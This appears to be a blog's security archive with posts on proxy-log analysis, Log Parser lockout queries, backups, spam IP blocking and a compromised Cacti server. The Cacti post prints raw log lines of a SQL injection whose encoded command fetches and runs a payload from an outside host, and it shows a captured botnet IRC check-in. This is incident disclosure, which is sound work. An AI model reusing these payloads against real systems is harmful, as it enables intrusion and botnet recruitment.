Recently in Security Category

Working with Bluecoat files in the raw can be time-consuming. Findstr and grep only work so fast. Windows grep is slow. I know SQL syntax OK, so I tend to dump logfiles into databases to analyze them for activity. There are certainly other ways to do it, such as using a reporting tool for Bluecoat. (Splunk's free Bluecoat application, e.g.).

Theoretically, Bluecoat logfiles are the same as W3C web server log files that logparser can consume via the -i:W3C directive.

You can see the fields in a Bluecoat log below.

#Fields: date time time-taken c-ip cs-username cs-auth-group x-exception-id sc-filter-result cs-categories cs(Referer) sc-status s-action cs-method rs(Content-Type) cs-uri-scheme cs-host cs-uri-port cs-uri-path cs-uri-query cs-uri-extension cs(User-Agent) s-ip sc-bytes cs-bytes x-virus-id

For some reason, Bluecoat leaves two spaces between cs(Referer) and sc-status, so every column to the right of cs(Referer) ends up one off. Bluecoat also puts spaces in cs-categories and surrounds the value with quotation marks, so you need to specify -dQuotes:ON. Logparser doesn't have a quick and easy way to handle the double-space issue, so I wrote a VBScript to handle it. (VBScript is pretty quick at text handling, and it's much faster than doing a search and replace in WordPad or Notepad on a 500-1000 MB file.)

Here's the VBScript:
'start
Set objFSO = CreateObject("Scripting.FileSystemObject")
'change this line to wherever you want to read the input from.
Set objTextFile = objFSO.OpenTextFile("c:\myBluecoatlog.log", 1)
Set objNewFile = objFSO.CreateTextFile("c:\myCleanBlueCoatlog.log")
Do Until objTextFile.AtEndOfStream
    myString = objTextFile.ReadLine
    'collapse the double space Bluecoat leaves after cs(Referer) into a single space
    objNewFile.WriteLine Replace(myString, "  ", " ")
Loop
objTextFile.Close
objNewFile.Close
'end vbscript
Here's the logparser file:
-------------------start
SELECT TO_LOCALTIME(TO_TIMESTAMP(date, time)) AS date,
time-taken,
c-ip,
cs-username,
cs-auth-group,
x-exception-id,
sc-filter-result,
cs-categories,
cs(Referer) AS Referer,
sc-status AS scStatus,
s-action,
cs-method,
rs(Content-Type) AS ContentType,
cs-uri-scheme,
cs-host,
cs-uri-port,
cs-uri-path,
cs-uri-query,
cs-uri-extension,
cs(User-Agent) AS UserAgent,
s-ip,
sc-bytes,
cs-bytes,
x-virus-id

INTO BlueCoat4
FROM c:\myCleanBlueCoatlog.log
------------------end
And here's the command line for logparser. (Save the logparser file as c:\scripts\log\bluecoat.sql)

logparser file:c:\scripts\log\bluecoat.sql -i:W3C -o:SQL -server:sqlservername -database:BLUECOAT -createtable:ON -dQuotes:ON


Statistics:
-----------

Elements processed: 613076
Elements output: 613076
Execution time: 241.20 seconds (00:04:1.20)
About 2500 lines/sec. Processor utilization is almost zero for SQL and logparser, so it's all about disk time.

The above is from a file that's 310,935,417 bytes large. That means BlueCoat logs are about 507 bytes per line, or 0.5k per line before compression. The last time I checked BlueCoat gz compression, it was about 15% of the original file size. Compressed, the line would cost you 76 bytes.
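The same pipeline (clean the double space, honour the quoted cs-categories field, load into a table, query it) written in Python as an added example, not code from the post: the csv module with delimiter=' ' and skipinitialspace=True does the VBScript's job and the -dQuotes:ON job at once, and an in-memory SQLite table stands in for the SQL Server target. The sample log is constructed to show both Bluecoat quirks described above; rows whose field count disagrees with the #Fields header are rejected instead of being loaded shifted.

```python
import csv
import io
import sqlite3

# Constructed Bluecoat-style W3C log (not from the post) showing both quirks
# described in the post: a quoted cs-categories value containing spaces, and
# two spaces between cs(Referer) and sc-status. "\\" in the source is one backslash.
SAMPLE_LOG = """#Software: SGOS
#Version: 1.0
#Fields: date time time-taken c-ip cs-username cs-auth-group x-exception-id sc-filter-result cs-categories cs(Referer) sc-status s-action cs-method rs(Content-Type) cs-uri-scheme cs-host cs-uri-port cs-uri-path cs-uri-query cs-uri-extension cs(User-Agent) s-ip sc-bytes cs-bytes x-virus-id
2009-10-01 08:15:02 120 10.1.2.3 jdoe CORP\\Users - OBSERVED "Search Engines/Portals" http://www.example.com/  200 TCP_NC_MISS GET text/html http www.example.com 80 / - - "Mozilla/4.0 (compatible)" 10.1.1.1 5120 430 -
2009-10-01 08:15:04 15 10.1.2.3 jdoe CORP\\Users policy_denied DENIED "Malicious Sources/Malnets" -  403 TCP_DENIED GET text/html http evil.example.net 80 /dl.php id=7 php "Mozilla/4.0 (compatible)" 10.1.1.1 0 310 -
2009-10-01 08:16:10 9 10.1.2.4 - - policy_denied DENIED "Malicious Sources/Malnets" -  403 TCP_DENIED GET - http evil.example.net 80 /x.php - php "curl/7.19" 10.1.1.1 0 120 -
"""


def parse_w3c(text):
    """Yield one dict per data line, keyed by the names in the #Fields header.

    delimiter=' ' with quotechar='"' handles the quoted cs-categories value
    (what -dQuotes:ON does in logparser), and skipinitialspace=True collapses
    the double space after cs(Referer) (what the VBScript does), so columns
    do not shift. A line whose field count still disagrees with the header
    is rejected rather than loaded into the wrong columns.
    """
    fields = None
    reader = csv.reader(io.StringIO(text), delimiter=" ", quotechar='"',
                        skipinitialspace=True)
    for lineno, row in enumerate(reader, 1):
        if not row:
            continue
        if row[0].startswith("#"):
            if row[0] == "#Fields:":
                fields = row[1:]
            continue
        if fields is None:
            raise ValueError(f"line {lineno}: data before #Fields header")
        if len(row) != len(fields):
            raise ValueError(f"line {lineno}: {len(row)} fields, header has {len(fields)}")
        yield dict(zip(fields, row))


def load_sqlite(rows, table="BlueCoat4"):
    """Load parsed rows into an in-memory SQLite table, standing in for the
    post's -o:SQL -createtable:ON step. Columns keep the W3C names, which is
    why they are double-quoted in the SQL."""
    rows = list(rows)
    cols = list(rows[0])
    conn = sqlite3.connect(":memory:")
    conn.execute('CREATE TABLE "%s" (%s)' % (table, ", ".join('"%s" TEXT' % c for c in cols)))
    conn.executemany('INSERT INTO "%s" VALUES (%s)' % (table, ", ".join("?" * len(cols))),
                     [tuple(r[c] for c in cols) for r in rows])
    conn.commit()
    return conn


def denied_by_host(conn, table="BlueCoat4"):
    """Destinations the proxy blocked, with hit count and number of distinct
    clients: the 'who else talked to that host' question the SQL dump is for."""
    sql = ('SELECT "cs-host", COUNT(*), COUNT(DISTINCT "c-ip") FROM "%s" '
           'WHERE "sc-filter-result" = ? GROUP BY "cs-host" ORDER BY 2 DESC' % table)
    return conn.execute(sql, ("DENIED",)).fetchall()


if __name__ == "__main__":
    conn = load_sqlite(parse_w3c(SAMPLE_LOG))
    for host, hits, clients in denied_by_host(conn):
        print(f"{host}: {hits} denied hits from {clients} client(s)")
```

The field-count check is the part worth keeping whatever tool you load with: a row that is one column off is worse than a rejected row, because it lands a status code in the referrer column and nobody notices until a query returns nonsense.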

Neither did I. Hardly anyone knows, because few people take DHS seriously, and nobody outside the Federal government has said "Cyber" since the nineties. I attended a computer security conference recently and listened to a panel of current and former federal officials speak about "Cyber" security. They might one day be able to secure government systems, but they're a long way off from protecting you and me online. One of the few things they can do to protect us is to stage a public awareness campaign -- thus we have Cybersecurity Awareness Month.

Why doesn't Google have a Cybersecurity graphic? Online providers don't want you to think about security. Banks don't want you to think about online security. If you thought about security when you signed up for online banking, you might not do it. Without the regulatory agencies, the banks would leave you liable for all losses -- even those caused by the bank's own security lapses, as happened in the UK.

A banking-industry consultant at the same conference said two striking things:


  1. Bank marketers fought tooth and nail against FFIEC regulations requiring two-factor authentication for online banking logons. (That means you need your password AND something else to log on.) Banking marketers want to make it easy for you (or a hacker) to log on and transfer funds.

  2. Banking customer service representatives are just as dumb as the customers when it comes to online security.

If your bank account gets hacked, your bank isn't going to be of much help. They might get some money back, but in most cases, they won't. Your money's gone. The same goes for any other account of yours that gets hacked, whether it's Facebook, GMail, or Yahoo. Nobody's going to help you much.

So take the time now to do a few things to ensure your online security.


  1. Use antivirus and make sure it's up to date. If you're on Windows, there are several free antivirus packages available, such as Microsoft Security Essentials, Avast, and Avira. Password-stealing viruses infect computers every day. If you want to tweak out on antivirus effectiveness comparisons, go here.

  2. Patch your computer. It doesn't matter if you're windows, mac, unix, linux or bsd. Patch.

  3. Change your banking password. Change your email password, because all your password resets go there. Change your security questions, because those reset your passwords. If you're using the same password from college, and your college system gets hacked and reveals your password, then they will find your other accounts.

  4. Realize that you are a hundred times more likely to fall for a phishing email than you are to click on an online ad. (Phishing emails are now so common that you might get one that coincides with a recent transaction, making you think it's real.) Now that banks have increased their online security, the hackers are targeting you -- the soft spot.

  5. Also realize there are now office buildings full of professional hackers working in shifts trying to get to your money. (Another panelist, Chris Roberts, talked about research he had done observing the building in an unnamed country in Eastern Europe. Some of his work is available on McAfee's hacker-commerce site.)

  6. Don't use unsecured wireless networks. Secure your home wireless network. (Replace WEP encryption with WPA or WPA2.)

Just because disk space is getting cheap, don't think that storage is cheap. A referral from Slashdot to Backblaze's blog charted the situation out accurately. The cost of a petabyte of storage on raw SATA hard drives is $81,000. On Amazon and EMC, it's $2.8 million. If Backblaze really could create their own enterprise storage devices, then it would be possible to offer backups at $5/month for unlimited storage. Backblaze even offers a 15-day free trial, so I tried it, although I was skeptical.

Catches:
1) You need to use their client.
2) Their client doesn't run on Windows Server or Linux -- just WinXP, Vista, and Macintosh. (Even if you run the installer in XP compatible mode on Windows server, it still doesn't install.)
3) The $5/month is for one computer, not all the computers in my house.
4) rsync doesn't work with Windows/samba shares. (You may, however, be able to get rsync to work to a Macintosh. I haven't tested yet.) (Update below: you can install an NFS server onto Windows XP/Vista to get rsync to work, or you could do it from Windows via an SSH rsync script.)

Solution: I installed it on a Vista workstation, created a share, and copied the few things I really need backed up to it. I also wrote scripts to transfer my PBX backups to my backup and log host and then copy the files from the backup server to the windows share via smbclient. I'll skip the part about configuring password-less logins for SSH via ssh-keygen keys, as well as the kinit for logging into windows via smbclient. (I also never was able to mount.cifs via kinit, just smbclient.)

So what happened when I tried to back up 15 GB on my Vista box to Backblaze? Not much -- the files just transferred. iPod library -- check. Photos -- check. My mrtg indicated that bandwidth increased to about 310 kbps for four days. I was still able to make phone calls via my SIP trunk to vitelity with no problems. (g729 to my SIP provider and alaw to my friends' PBX servers via IPSec VPN.)

Bandwidth used (mrtg "Weekly" graph, 30-minute average; the image mrtgBackblaze.png is not reproduced here):

      Max                  Average             Current
In    501.9 kb/s (0.5%)    56.4 kb/s (0.1%)    47.9 kb/s (0.0%)
Out   1360.2 kb/s (1.4%)   168.6 kb/s (0.2%)   29.3 kb/s (0.0%)

Security comments: Backblaze says it encrypts files, but doesn't offer details on the algorithm or implementation (e.g. AES-CBC). Backblaze does offer you the option of using a private key, so that only you (assuming you don't forget the key) can access your files.

My advice: If it needs to stay secure, encrypt the files yourself before they hit the local hard disk. You can even do a loopback mount to an AES-encrypted file on a samba share (there's a super-awesome tutorial for that), and rsync will work, but the whole file will change every time, requiring all of it to be sent to Backblaze again.

Update: You can use rsync to get your Linux/BSD/Unix files over to your windows box, but you'll need to install an NFS Server on your windows box. You could also use Microsoft's Services for Unix, but it's easier just using the Allegro server.

To find account lockout events on multiple domain controllers, download logparser 2.2 and execute the following command in a domain admin context (e.g. runas /user:domain\administrator logparser.exe), where the part below the command goes in "lockouts.sql". The account lockout event is 644; if you need to find others, read Microsoft's KB174074. Also, this script will read each domain controller's security event log sequentially, so if you're in a hurry, run a separate logparser process for each domain controller.

logparser.exe file:c:\scripts\logparser\lockouts.sql -i:EVT -o:datagrid

------stick this part in lockouts.sql
SELECT
timegenerated AS LogonTime,
extract_token(strings, 0, '|') AS UserName,
message as Message
FROM \\domaincontroller1\security, \\domaincontroller2\security, \\domaincontroller3\security
WHERE EventID = 644
-----end here

If you want the output to go into a database instead of a datagrid (Excel-type) table, make the logparser command look like this:

logparser.exe file:c:\scripts\logparser\lockouts.sql -i:EVT -o:SQL -server:myDBservername -driver:"SQL Server" -database:myDBname -createtable:ON

Table name will end up matching your dbname. Set -createtable to off after you run it once.
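The same aggregation done outside Log Parser, as an added Python example that is not from the post. The records are constructed to mirror Log Parser's EVT input fields (TimeGenerated, EventID, ComputerName, Strings), and the Strings layout assumes the documented event 644 insertion-string order (target account name, target account ID, caller machine name, caller user name, caller domain, caller logon ID), which is also why the query above can take token 0 as the user name. The example goes one step past the query: it also pulls token 2, the caller machine, because that is the box sending the bad passwords and the thing you actually have to go fix.

```python
# Constructed lockout records (not real event log data). Field names follow
# Log Parser's EVT input format; Strings is the pipe-joined insertion-string
# list, assumed here to be in the documented event 644 order.
SAMPLE_EVENTS = [
    {"TimeGenerated": "2009-10-05 08:01:10", "EventID": 644, "ComputerName": "DC1",
     "Strings": "jdoe|S-1-5-21-1-2-3-1105|WS-FINANCE-07|SYSTEM|NT AUTHORITY|(0x0,0x3E7)"},
    {"TimeGenerated": "2009-10-05 08:01:12", "EventID": 528, "ComputerName": "DC1",
     "Strings": "asmith|CORP|(0x0,0x1A2B)|2"},  # not a lockout; different layout, ignored
    {"TimeGenerated": "2009-10-05 08:31:40", "EventID": 644, "ComputerName": "DC2",
     "Strings": "jdoe|S-1-5-21-1-2-3-1105|WS-FINANCE-07|SYSTEM|NT AUTHORITY|(0x0,0x3E7)"},
    {"TimeGenerated": "2009-10-05 09:02:05", "EventID": 644, "ComputerName": "DC3",
     "Strings": "svc_backup|S-1-5-21-1-2-3-1201|SRV-OLD-BACKUP|SYSTEM|NT AUTHORITY|(0x0,0x3E7)"},
    {"TimeGenerated": "2009-10-05 09:32:11", "EventID": 644, "ComputerName": "DC3",
     "Strings": "svc_backup|S-1-5-21-1-2-3-1201|SRV-OLD-BACKUP|SYSTEM|NT AUTHORITY|(0x0,0x3E7)"},
    {"TimeGenerated": "2009-10-05 09:40:00", "EventID": 644, "ComputerName": "DC1",
     "Strings": "bwong|S-1-5-21-1-2-3-1310|WS-SALES-11|SYSTEM|NT AUTHORITY|(0x0,0x3E7)"},
]


def extract_token(strings, index, sep="|"):
    """Same job as Log Parser's EXTRACT_TOKEN(strings, index, '|')."""
    parts = strings.split(sep)
    return parts[index] if index < len(parts) else None


def summarize_lockouts(events, lockout_id=644):
    """Group lockouts per account across every domain controller: how many,
    first and last time, which DCs recorded them, and the caller machine
    (token 2), i.e. where the bad passwords are coming from."""
    summary = {}
    for ev in events:
        if ev["EventID"] != lockout_id:
            continue
        user = extract_token(ev["Strings"], 0)
        entry = summary.setdefault(user, {"count": 0, "first": None, "last": None,
                                          "dcs": set(), "callers": set()})
        ts = ev["TimeGenerated"]  # ISO-style strings sort chronologically
        entry["count"] += 1
        entry["first"] = ts if entry["first"] is None else min(entry["first"], ts)
        entry["last"] = ts if entry["last"] is None else max(entry["last"], ts)
        entry["dcs"].add(ev["ComputerName"])
        entry["callers"].add(extract_token(ev["Strings"], 2))
    return summary


def repeat_offenders(summary, min_count=2):
    """Accounts locked out repeatedly are usually a stale credential on the
    caller machine (a service, a mapped drive, a scheduled task) rather than
    a user typing badly; return them with the machines to visit."""
    return sorted((user, sorted(e["callers"]))
                  for user, e in summary.items() if e["count"] >= min_count)


if __name__ == "__main__":
    for user, machines in repeat_offenders(summarize_lockouts(SAMPLE_EVENTS)):
        print(f"{user}: repeated lockouts, caller machine(s) {', '.join(machines)}")
```

If you would rather stay in Log Parser, the equivalent change to the query above is a second EXTRACT_TOKEN(strings, 2, '|') AS CallerMachine column; the Python version is for when you want to merge the output of the per-DC processes the post suggests running in parallel.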

Props to: Microsoft's Log Parser Toolkit, by Gabriele Giuseppini and Mark Burnett.

If you're going to be doing anything with windows logs, buy the book. It's more useful than several log management software packages I've demo'ed.

Download Log Parser here.

I had 41,000 spam comments in my photo gallery. I had thousands of unpublished spams on my blog here. Spam comments were showing up as valid keywords attracting traffic on Google searches. So a couple of weeks ago, I shut down commenting in MovableType. It turns out that one other problem, mt.cgi consuming 2 GB of RAM and all my processor time, was a separate issue. ImageMagick is NOT optional in MT 4.2. I had installed it, but MT couldn't find it. Thus an infinite loop consumed all my resources through our favorite cgi-bin, mt.cgi. Fixed that, but what about comments?

I didn't think Gallery was popular enough to be targeted by automated scripts. I thought CAPTCHAs could stop them. I was quite wrong. I upgraded Gallery to 2.3 and got a WordPress API key for Akismet, which I'm now using in MT and Gallery.

I also looked at my logs, and found that 99% of my Gallery spam comments came from a limited set of IPs. Since I started blocking them at the firewall, I've seen 13,000 attempted hits from them. Here they are. If you're running Gallery, ban them now.

91.121.108.25
91.121.110.118
91.121.111.27
91.121.111.28
91.121.120.173
91.121.143.168
91.121.169.207
91.121.179.28
91.121.71.155
91.121.81.48.3
91.121.81.48.5
91.121.84.162

Secunia says Cacti has four known vulnerabilities. I had forgotten that I had installed Cacti when I was trying to count the pages I had printed and compare those results with those from my HP printer. Same IP as my computer was IRCing to. I should start tracking changes so I can have a record of what was changed, when it was changed, and whether I granted myself access.

Here are the log files from apache:


213.189.5.233 - - [21/May/2007:14:44:14 -0400] "GET /cacti/ HTTP/1.0" 200 1327 "-" "-"
213.189.5.233 - - [22/May/2007:04:08:21 -0400] "GET /cacti/cmd.php?1+1111)/**/UNION/**/SELECT/**/2,0,1,1,CHAR(49,50,55,46,48,46,48,46,49),null,1,null,null,161,500,CHAR(112,114,111,99),null,1,300,0,CHAR(32,119,103,101,116,32,104,116,116,112,58,47,47,105,99,101,109,97,110,46,109,97,114,116,101,46,114,111,47,103,46,106,112,103,32,45,79,32,47,116,109,112,47,103,46,106,112,103,59,116,97,114,32,120,122,118,102,32,47,116,109,112,47,103,46,106,112,103,32,45,67,32,47,116,109,112,59,47,116,109,112,47,103,111,32,62,32,46,47,114,114,97,47,115,117,110,116,122,117,46,108,111,103),null,null/**/FROM/**/host/*+11111 HTTP/1.0" 200 18 "-" "-"
213.189.5.233 - - [22/May/2007:04:17:07 -0400] "GET /cacti/cmd.php?1+1111)/**/UNION/**/SELECT/**/2,0,1,1,CHAR(49,50,55,46,48,46,48,46,49),null,1,null,null,161,500,CHAR(112,114,111,99),null,1,300,0,CHAR(32,102,101,116,99,104,32,45,111,32,47,116,109,112,47,103,111,46,106,112,103,32,104,116,116,112,58,47,47,105,99,101,109,97,110,46,109,97,114,116,101,46,114,111,47,103,111,46,106,112,103,59,116,97,114,32,120,122,118,102,32,47,116,109,112,47,103,111,46,106,112,103,32,45,67,32,47,116,109,112,59,47,116,109,112,47,103,111,32,62,32,46,47,114,114,97,47,115,117,110,116,122,117,46,108,111,103),null,null/**/FROM/**/host/*+11111 HTTP/1.0" 200 18 "-" "-"
213.189.5.233 - - [22/May/2007:04:17:09 -0400] "GET /cacti/rra/suntzu.log HTTP/1.0" 404 296 "-" "-"
213.189.5.233 - - [22/May/2007:04:17:09 -0400] "GET /cacti/cmd.php?1+1111)/**/UNION/**/SELECT/**/2,0,1,1,CHAR(49,50,55,46,48,46,48,46,49),null,1,null,null,161,500,CHAR(112,114,111,99),null,1,300,0,CHAR(114,109,32,46,47,114,114,97,47,115,117,110,116,122,117,46,108,111,103),null,null/**/FROM/**/host/*+11111 HTTP/1.0" 200 18 "-" "-"

Apparently, that was all it took for my server to be compromised.
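Detection logic for the request pattern above, written as an added Python example (not the post's code, and not tied to Cacti): a parser for Apache's combined log format, a scorer that looks for the injection indicators visible in those lines (inline /**/ comments in place of whitespace, UNION ... SELECT, CHAR(n,n,...) encoding, a closing parenthesis that never opened), and a context view of every request from a flagged source. The log lines are constructed to have the same shape as the post's; the IPs are documentation addresses and the CHAR() list decodes to nothing meaningful.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-log lines (not the post's), shaped like the
# sequence in the post: a hit on the application root, a comment-obfuscated
# UNION SELECT against a script, a probe for a file under the same tree,
# and one ordinary request from someone else.
SAMPLE_LINES = [
    '198.51.100.9 - - [21/May/2007:14:44:14 -0400] "GET /cacti/ HTTP/1.0" 200 1327 "-" "-"',
    '198.51.100.9 - - [22/May/2007:04:08:21 -0400] "GET /cacti/cmd.php?1+1111)/**/UNION/**/SELECT/**/2,0,1,1,CHAR(49,50,55),null/**/FROM/**/host/*+11111 HTTP/1.0" 200 18 "-" "-"',
    '198.51.100.9 - - [22/May/2007:04:17:09 -0400] "GET /cacti/rra/example.log HTTP/1.0" 404 296 "-" "-"',
    '203.0.113.4 - - [22/May/2007:10:00:00 -0400] "GET /cacti/graph_view.php?action=tree HTTP/1.1" 200 8841 "http://intranet.example/" "Mozilla/5.0"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')
COMMENT_RE = re.compile(r"/\*.*?\*/")


def parse_line(line):
    """Combined log format -> dict of named fields, or None if no match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def sqli_indicators(uri):
    """Names of the injection indicators present in the query string.
    Inline comments are removed before keyword matching, because /**/ in
    place of whitespace is the usual way keyword filters get evaded."""
    raw_query = unquote(uri).partition("?")[2]
    query = re.sub(r"\s+", " ", COMMENT_RE.sub(" ", raw_query))
    found = []
    if "/*" in raw_query:
        found.append("inline-comment")
    if re.search(r"\bUNION\b.{0,40}\bSELECT\b", query, re.I):
        found.append("union-select")
    if re.search(r"\bCHAR\s*\(\s*\d+(\s*,\s*\d+)*\s*\)", query, re.I):
        found.append("char-encoding")
    if query.count(")") > query.count("("):
        found.append("unbalanced-paren")  # closes an expression it never opened
    return found


def flagged_requests(lines):
    """Requests carrying at least one indicator, with their status code: a
    200 means the script accepted the request, which is the line to act on."""
    out = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        ind = sqli_indicators(entry["uri"])
        if ind:
            out.append({"ip": entry["ip"], "ts": entry["ts"], "uri": entry["uri"],
                        "status": entry["status"], "indicators": ind})
    return out


def source_context(lines):
    """Every request from each flagged source, in log order, so the analyst
    sees what was fetched before and after the injection (in the post's log
    a request for a file under rra/ sits between the injected requests)."""
    entries = [e for e in (parse_line(l) for l in lines) if e]
    suspects = {f["ip"] for f in flagged_requests(lines)}
    return {ip: [(e["ts"], e["uri"], e["status"]) for e in entries if e["ip"] == ip]
            for ip in suspects}


if __name__ == "__main__":
    for f in flagged_requests(SAMPLE_LINES):
        print(f'{f["ts"]} {f["ip"]} {f["status"]} {", ".join(f["indicators"])}')
    for ip, reqs in source_context(SAMPLE_LINES).items():
        print(f"{ip}: {len(reqs)} requests in total")
```

Run this over a day of access logs rather than a grep for "UNION": the comment stripping and the parenthesis count catch the variants a keyword search misses, and the 200 on the injected request is what separates "something probed the app" from "the app ran the query".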

Also, I saved the tcpdump from my previous post as an HTML file for people that had trouble with it.

If you've ever wondered exactly how a vulnerability is exploited, or how botnets happen, check the below. Keep in mind that my system is up-to-date on just about everything I can find to update on it. I've also informed the abuse address of the IP in question about what was going on over a month ago, and the rogue server is still out there, relaying information from compromised Linux servers.

I keep a lot of outbound ports closed so that if one of my servers is compromised, it doesn't become another bot on the net. I finally caught the process again, so I started a capture and then opened the ports. I'm not sure what to make of it because the IP address in question goes back to what appears to be a dedicated server in Italy, but the login information says it's a NASA IRC server. What NASA would be doing serving IRC to the public is beyond me, unless it's a honeypot. It's probably not a real NASA server, at least that's what I hope. Anyway, here are the fun details of what happens when my server tries to call home to its haxor:

The packet analysis also reveals a clue about the origin of the hack: Mihai is the Romanian version of Michael.

Download the uncensored TCPDump file and see for yourself.

My server: SYN
213.92.118.223 223-118-92-213.serverdedicati.seflow.net ACK
my server: ACK SYN
my server: ...i
my server: NICK a3sh-.
: NOTICE AUTH :*** Looking up your hostname..NOTICE AUTH :*** Checking Ident..
my server: ....
: NOTICE AUTH :*** No ident response..
my server: FF 86 C5 CD
: NOTICE AUTH :*** Found your hostname.
my server: ....
:.y.I
my server: USER nh2ies x.x.x.x 213.92.118.223 :Linux mrtg.sampas.net 2.6.9-42.0.10.ELsmp #1 SMP Fri Feb 16 17:17:21 EST 2007 i686 i686 i386 GNU/Linux.
: PING :1041065789..
my server: ....
: .y..
my server: PONG :1041065789.
: (ACK)
: www.nasa.gov 433 * a3sh- :Nickname is already in use..
my server: (ACK)
my server: NICK a3sh-685.
: :www.nasa.gov 001 a3sh-685 :Welcome to the Internet Relay Network : a3sh-685..:www.nasa.gov 002 a3sh-685 :Your host is www.nasa.gov, running version beware1.5.7..:www.nasa.gov 003 a3sh-685 :This server was created Tue Jul 13 2004 at 20:36:17 GMT..:www.nasa.gov 004 a3sh-685 www.nasa.gov beware1.5.7 dgikoswx biklmnoprstv..:www.nasa.gov 005 a3sh-685 MAP SILENCE=15 WHOX WALLCHOPS WALLVOICES USERIP CPRIVMSG CNOTICE MODES=6 MAXCHANNELS=10 MAXBANS=45 :are supported by this server..:www.nasa.gov 005 a3sh-685 NICKLEN=19 TOPICLEN=160 AWAYLEN=160 KICKLEN=160 CHANTYPES=#& PREFIX=(ov)@+ CHANMODES=b,k,l,rimnpst CASEMAPPING=rfc1459 :are supported by this server..:www.nasa.gov 251 a3sh-685 :There are 172 users and 0 invisible on 1 servers..:www.nasa.gov 254 a3sh-685 1 :channels formed..:www.nasa.gov 255 a3sh-685 :I have 172 clients and 0 servers..:www.nasa.gov NOTICE a3sh-685 :Highest connection count: 195 (195 clients)..:www.nasa.gov 422 a3sh-685 :MOTD File is missing..:www.nasa.gov NOTICE a3sh-685 :on 1 ca 1(4) ft 10(10)..
my server: JOIN #mihai.
::www.nasa.gov 001 a3sh-685 :Welcome to the Internet Relay Network a3sh-685..:www.nasa.gov 002 a3sh-685 :Your host is www.nasa.gov, running version beware1.5.7..:www.nasa.gov 003 a3sh-685 :This server was created Tue Jul 13 2004 at 20:36:17 GMT..:www.nasa.gov 004 a3sh-685 www.nasa.gov beware1.5.7 dgikoswx biklmnoprstv..:www.nasa.gov 005 a3sh-685 MAP SILENCE=15 WHOX WALLCHOPS WALLVOICES USERIP CPRIVMSG CNOTICE MODES=6 MAXCHANNELS=10 MAXBANS=45 :are supported by this server..:www.nasa.gov 005 a3sh-685 NICKLEN=19 TOPICLEN=160 AWAYLEN=160 KICKLEN=160 CHANTYPES=#& PREFIX=(ov)@+ CHANMODES=b,k,l,rimnpst CASEMAPPING=rfc1459 :are supported by this server..:www.nasa.gov 251 a3sh-685 :There are 172 users and 0 invisible on 1 servers..:www.nasa.gov 254 a3sh-685 1 :channels formed..:www.nasa.gov 255 a3sh-685 :I have 172 clients and 0 servers..:www.nasa.gov NOTICE a3sh-685 :Highest connection count: 195 (195 clients)..:www.nasa.gov 422 a3sh-685 :MOTD File is missing..:www.nasa.gov NOTICE a3sh-685 :on 1 ca 1(4) ft 10(10)..

:a3sh-685!~nh2ies@c-68-34-65-58.hsd1.md.comcast.net JOIN :#mihai..:www.nasa.gov 353 a3sh-685 = #mihai :a3sh-685 a3sh-9337 a3sh-4554 a3sh-8354 a3sh-2934 a3sh-3103 a3sh-8151 a3sh-4633 a3sh-3872 a3sh-2552 a3sh-1595 a3sh-9230 a3sh-5907 a3sh-2313 a3sh-6041 a3sh-2448 a3sh-5134 a3sh-3633 a3sh-5025 a3sh-1979 a3sh-9893 a3sh-8688 a3sh-7544 a3sh-4987 a3sh-975 a3sh-8640 a3sh-7756 a3sh-6376 a3sh-9321 a3sh-5422 a3sh-5761 a3sh-9259 a3sh-5956 a3sh-7978 a3sh-9088 a3sh-701 a3sh-4473 a3sh-7260 a3sh-2013 a3sh-9890 a3sh-933 a3sh-8007 a3sh-6486 a3sh-7318 a3sh-5495 a3sh-6205 a3sh-6078..:www.nasa.gov 353 a3sh-685 = #mihai :a3sh-7555 a3sh-791 a3sh-1336 a3sh-5923 a3sh-4822 a3sh-8527 a3sh-4988 a3sh-90 a3sh-4895 a3sh-7019 a3sh-6666 a3sh-4330 a3sh-8521 a3sh-215 a3sh-5509 a3sh-6106 a3sh-4579 a3sh-8655 a3sh-1998 a3sh-9573 a3sh-5017 a3sh-6554 a3sh-8403 a3sh-288 a3sh-3328 a3sh-4059 a3sh-6246 a3sh-697 a3sh-7085 a3sh-9646 a3sh-8876 a3sh-6779 a3sh-3730 a3sh-8248 a3sh-4757 a3sh-7497 a3sh-4715 a3sh-4357 a3sh-229 a3sh-4681 a3sh-8629 a3sh-2734 a3sh-6290 a3sh-930 a3sh-1515 a3sh-1103 a3sh-3405 a3sh-9597..:www.nasa.gov 353 a3sh-685 = #mihai :a3sh-914 a3sh-2419 a3sh-1961 a3sh-624 a3sh-9217 a3sh-8124 a3sh-9198 a3sh-1667 a3sh-7710 a3sh-3272 a3sh-2880 a3sh-5360 a3sh-9749 a3sh-60 a3sh-6378 a3sh-2191 a3sh-8644 a3sh-1313 a3sh-2447 a3sh-3410 a3sh-4480 a3sh-8506 a3sh-1625 a3sh-5664 a3sh-5614 a3sh-9804 a3sh-1344 a3sh-4523 a3sh-7203 a3sh-3438 a3sh-3646 a3sh-6682 a3sh-8430 a3sh-700 a3sh-4929 a3sh-9957 a3sh-9284 a3sh-1775 +a3sh-3250 a3sh-2594 a3sh-3037 a3sh-3353 a3sh-2931 a3sh-366 a3sh-934 a3sh-1772 a3sh-8760 a3sh-7777..:www.nasa.gov 353 a3sh-685 = #mihai :a3sh-8519 a3sh-8691 a3sh-9382 a3sh-3749 a3sh-8126 a3sh-5627 a3sh-1038 a3sh-3316 a3sh-5240 a3sh-379 a3sh-6854 a3sh-9518 a3sh-1493 a3sh-7073 a3sh-9670 +a3sh-3201 a3sh-7933 a3sh-4989 a3sh-960 a3sh-3584 a3sh-7571 a3sh-9905 a3sh-6198 a3sh-9436 a3sh-7021 a3sh-9951 a3sh-43 a3sh-1578 @a3sh-..:www.nasa.gov 366 a3sh-685 #mihai :End of /NAMES list...
